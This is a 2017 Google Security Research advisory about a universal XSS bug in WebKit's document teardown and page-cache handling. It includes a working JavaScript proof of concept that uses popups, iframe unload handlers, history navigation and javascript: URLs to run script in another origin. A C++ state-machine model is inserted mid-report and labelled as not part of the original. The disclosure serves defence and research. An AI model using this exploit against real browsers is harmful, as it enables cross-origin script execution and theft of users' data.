WebKit Document::prepareForDestruction / CachedFrame Universal XSS
Source: Google Security Research  Author: lokihardt  Published: 2017-06-01
WebKit: UXSS via Document::prepareForDestruction and CachedFrame 




Here's a snippet of Document::prepareForDestruction

void Document::prepareForDestruction()
{
    if (m_hasPreparedForDestruction)
        return;
    ...
    detachFromFrame();

    m_hasPreparedForDestruction = true;
}

Document::prepareForDestruction is called on the assumption that the document will never be used with its frame again. However, if the frame is cached while Document::prepareForDestruction is running, the document's frame is stored in a CachedFrame object that later reattaches it, and from then on the document's frame will never be detached, because |m_hasPreparedForDestruction| is already set.
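To make the lifecycle invariant concrete, here is an added example (not WebKit code and not part of lokihardt's report) that models the state machine in C++: a Document with the one-shot m_hasPreparedForDestruction flag, a CachedFrame that reattaches a stored frame, and a hypothetical canCache() guard that refuses to admit a document whose teardown has already started. The class and member names echo the report only for readability; the `tearingDown` marker, `canCache()`, and the `midTeardown` hook that stands in for the elided `...` are assumptions of this model, not the engine's actual fix.

```cpp
// Simplified, hypothetical model of the lifecycle bug described above.
// Not WebKit code: names mirror the report so the state machine is readable.
#include <cstdio>
#include <functional>
#include <memory>

struct Frame;

// Minimal document carrying the one-shot teardown flag from the report.
struct Document {
    Frame* frame = nullptr;               // back-pointer to the owning frame
    bool hasPreparedForDestruction = false;
    bool tearingDown = false;             // hypothetical guard for the hardened variant

    void detachFromFrame() { frame = nullptr; }

    // `midTeardown` stands in for the "..." in the report: work that runs
    // inside prepareForDestruction() before detachFromFrame().
    void prepareForDestruction(const std::function<void()>& midTeardown) {
        if (hasPreparedForDestruction)
            return;                       // one-shot: never detaches twice
        tearingDown = true;
        midTeardown();
        detachFromFrame();
        hasPreparedForDestruction = true;
    }
};

struct Frame {
    std::shared_ptr<Document> document;
};

// Page-cache entry: stashes a frame/document pair and can reattach it later.
struct CachedFrame {
    Frame* frame;
    std::shared_ptr<Document> document;
    explicit CachedFrame(Frame* f) : frame(f), document(f->document) {}
    void restore() {
        frame->document = document;
        document->frame = frame;          // reattached, but the one-shot flag is untouched
    }
};

// Hypothetical guard (assumption, not WebKit's fix): refuse to cache a document
// whose teardown has started or finished.
bool canCache(const Document& d) {
    return !d.tearingDown && !d.hasPreparedForDestruction;
}

// Drives the sequence from the report and reports whether the document still
// holds a frame pointer after its *second* prepareForDestruction().
// A correct lifecycle leaves that pointer null.
bool documentStillAttachedAfterSecondTeardown(bool hardened) {
    Frame frame;
    frame.document = std::make_shared<Document>();
    std::shared_ptr<Document> doc = frame.document;
    doc->frame = &frame;

    std::unique_ptr<CachedFrame> cached;
    doc->prepareForDestruction([&] {
        // Caching is attempted while teardown is in progress.
        if (!hardened || canCache(*doc))
            cached = std::make_unique<CachedFrame>(&frame);
    });

    if (cached)
        cached->restore();                // frame reattached to a "destroyed" document

    doc->prepareForDestruction([] {});    // early-returns: flag already set
    return doc->frame != nullptr;
}

int main() {
    std::printf("vulnerable: still attached = %d\n", documentStillAttachedAfterSecondTeardown(false));
    std::printf("hardened:   still attached = %d\n", documentStillAttachedAfterSecondTeardown(true));
    return 0;
}
```

The unguarded path returns true: after the cached frame is restored, the second teardown is a no-op and the document keeps a live frame pointer, which is the stale-attachment state the report describes. The guarded path returns false. The reviewable lesson is general: a one-shot teardown flag is only sound if nothing reachable from inside the teardown can move the object back into a live state; otherwise the re-admission point (here, caching) must check the teardown state itself.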


PoC:
<body>
Click anywhere.
<script>
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function waitFor(check, cb) {
    let it = setInterval(() => {
        if (check()) {
            clearInterval(it);
            cb();
        }
    }, 10);
}

window.onclick = () => {
    window.onclick = null;

    w = open(createURL(''), '', 'width=500, height=500');
    w.onload = () => {
        setTimeout(() => {
            let f = w.document.body.appendChild(document.createElement('iframe'));
            f.contentWindow.onunload = () => {
                f.contentWindow.onunload = null;

                w.__defineGetter__('navigator', () => new Object());

                let a = w.document.createElement('a');
                a.href = 'about:blank';
                a.click();

                setTimeout(() => {
                    w.history.back();
                    setTimeout(() => {
                        let d = w.document;
                        w.location = 'javascript:' + encodeURI(`"<script>location = 'https://abc.xyz/';</scrip` + `t>"`);

                        let it = setInterval(() => {
                            try {
                                w.xxxx;
                            } catch (e) {
                                clearInterval(it);

                                let a = d.createElement('a');
                                a.href = 'javascript:alert(location);';
                                a.click();
                            }
                        }, 10);
                    }, 100);
                }, 100);
            };

            w.location = 'javascript:""';
        }, 0);
    };

}

</script>
</body>

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

